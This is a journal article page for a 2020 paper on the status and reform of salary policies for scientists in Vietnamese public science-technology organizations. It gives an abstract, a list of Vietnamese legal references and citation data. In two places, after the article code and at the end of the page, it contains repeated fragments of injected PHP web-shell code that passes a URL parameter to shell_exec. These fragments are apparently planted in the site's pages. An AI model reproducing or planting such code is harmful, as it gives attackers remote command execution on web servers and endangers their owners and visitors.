Actual status and proposals for renovation of salary policies for scientists in links with orientations of reforms of salary policies in the new stage

  • Ha Cong Hai
Keywords: Salary for scientists, Salary policy, Salary reform

Abstract

Renovation of salary policies for scientists in public science-technology organizations stops being a new problem. They were put high in considerations from many years. Recently, the Government has made efforts to adjust salary policies for scientists. Up to now, however, the salary policies for scientists in public science-technology organizations still remain with many limitations and shortages. This paper provides analysis on the actual status of salary policies for scientists in public science-technology organizations and, on this basis, makes some proposals for renovation of salary policies for scientists in links with orientations of reforms of salary policies by the Party and the State in the new stage.

Code: 20022401

".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?>

Downloads

Download data is not yet available.

References

1. Nghị quyết số 27-NQ/TW ngày 21/5/2018 của Hội nghị lần thứ 7 Ban Chấp hành Trung ương Khóa XII về cải cách chính sách tiền lương đối với cán bộ, công chức, viên chức, lực lượng vũ trang và người lao động trong doanh nghiệp.
2. Nghị quyết số 19-NQ/TW ngày 25/10/2017 của Hội nghị lần thứ 6 Ban Chấp hành Trung ương Khóa XII về tiếp tục đổi mới hệ thống tổ chức và quản lý, nâng cao chất lượng và hiệu quả hoạt động của các đơn vị sự nghiệp công lập.
3. Nghị quyết số 107/NQ-CP ngày 16/8/2018 của Chính phủ về Chương trình hành động của Chính phủ thực hiện Nghị quyết số 27-NQ/TW ngày 21/5/2018 của Hội nghị lần thứ bảy Ban Chấp hành Trung ương khóa XII về cải cách chính sách tiền lương đối với cán bộ, công chức, viên chức, lực lượng vũ trang và người lao động trong doanh nghiệp.
4. Nghị định số 96/2010/NĐ-CP ngày 20/9/2010 của Chính phủ sửa đổi, bổ sung một số điều của Nghị định số 115/2005/NĐ-CP ngày 05/9/2005 quy định cơ chế tự chủ, tự chịu trách nhiệm của tổ chức KH&CN công lập và Nghị định số 80/2007/NĐ-CP ngày 19/5/2007 về doanh nghiệp KH&CN.
5. Nghị định số 40/2014/NĐ-CP ngày 12/5/2014 của Chính phủ quy định việc sử dụng, trọng dụng cá nhân hoạt động KH&CN.
6. Nghị định số 141/2013/NĐ-CP ngày 24/10/2013 của Chính phủ quy định chi tiết và hướng dẫn thi hành một số điều của Luật Giáo dục đại học.
7. Nghị định số 117/2016/NĐ-CP ngày 21/7/2016 của Chính phủ sửa đổi, bổ sung một số điều của Nghị định số 204/2004/NĐ-CP ngày 14/12/2004 về chế độ tiền lương đối với cán bộ, công chức, viên chức và lực lượng vũ trang.
8. Nghị định số 87/2014/NĐ-CP ngày 22/09/2014 của Thủ tướng Chính phủ quy định về thu hút cá nhân hoạt động KH&CN là người Việt Nam ở nước ngoài và chuyên gia nước ngoài tham gia hoạt động KH&CN tại Việt Nam.
9. Quyết định số 45/2014/QĐ-TTg của Thủ tướng Chính phủ ngày 15/8/2014 về chế độ phụ cấp ưu đãi nghề nghiệp đối với người làm việc trong các đơn vị thuộc lĩnh vực năng lượng nguyên tử của Bộ KH&CN.
10. Thông tư liên tịch số 24/2014/TTLT-BKHCN-BNV ngày 01/10/2014 của Bộ KH&CN và Bộ Nội vụ quy định mã số và tiêu chuẩn chức danh nghề nghiệp viên chức chuyên ngành KH&CN.
11. Thông tư số 08/2013/TT-BNV ngày 31/7/2013 của Bộ trưởng Bộ Nội vụ hướng dẫn thực hiện chế độ nâng bậc lương thường xuyên và nâng bậc lương trước thời hạn đối với cán bộ, công chức, viên chức và người lao động.
Published
2020-06-19
How to Cite
Hai, H. (2020, June 19). Actual status and proposals for renovation of salary policies for scientists in links with orientations of reforms of salary policies in the new stage. Journal SCIENCE AND TECHNOLOGY POLICIES AND MANAGEMENT, 9(1), 73-83. Retrieved from http://vietnamstijournal.net/index.php/JSTPM/article/view/325
Section
STUDIES OF STRATEGIES AND MANAGEMENT
".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?>